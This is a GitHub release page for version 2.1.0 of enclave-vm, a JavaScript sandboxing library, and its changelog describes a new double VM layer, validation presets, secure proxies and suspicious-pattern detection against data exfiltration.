Skip to content

enclave-vm@2.1.0

Choose a tag to compare

View all tags
@github-actions github-actions released this 05 Jan 01:31
· 51 commits to main since this release
enclave-vm@2.1.0
6b58618
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

enclave-vm v2.1.0

📦 npm: enclave-vm@2.1.0

Added

  • Default double VM layer with parent/inner VMs, operation validation, rate limiting, and suspicious-pattern detection (libs/enclave-vm/src/double-vm/**/*).
  • Configurable doubleVm options plus exported DoubleVmConfig/ParentValidationConfig so callers can tune the parent validation stage (libs/enclave-vm/src/types.ts, libs/enclave-vm/src/enclave.ts).
  • AST validation preset selection via the new preset option covering agentscript/strict/secure/standard/permissive modes (libs/enclave-vm/src/enclave.ts, libs/enclave-vm/src/index.ts).
  • Reference helpers such as BlockedPropertyCategory and REF_ID_SUFFIX are now exported for consumers that integrate with the reference sidecar (libs/enclave-vm/src/types.ts, libs/enclave-vm/src/sidecar/reference-config.ts).

Changed

  • Breaking: Enclave now routes execution through the double VM wrapper by default and only falls back to raw adapters when doubleVm.enabled is set to false (libs/enclave-vm/src/enclave.ts).
  • Custom globals injected into the VM are automatically wrapped in secure proxies to block prototype-chain attacks (libs/enclave-vm/src/adapters/vm-adapter.ts).
  • clearProxyCache() now throws to make it clear the API is unsupported and unnecessary (libs/enclave-vm/src/secure-proxy.ts).

Removed

  • Removed the unused allowFunctionBinding option from SecureProxyOptions; function binding is always handled by the proxy rules (libs/enclave-vm/src/secure-proxy.ts).

Fixed

  • Pattern serialization and suspicious-pattern plumbing now reject unsafe detector bodies, handle JSON.stringify failures, and preserve error causes when bubbling through the parent VM (libs/enclave-vm/src/double-vm/suspicious-patterns.ts, libs/enclave-vm/src/double-vm/double-vm-wrapper.ts).

Security

  • Parent VM suspicious-pattern detectors block data exfiltration, enumeration, credential leaks, and bulk operations before tool calls reach the host (libs/enclave-vm/src/double-vm/suspicious-patterns.ts, libs/enclave-vm/src/double-vm/parent-vm-bootstrap.ts).
Assets 2
Loading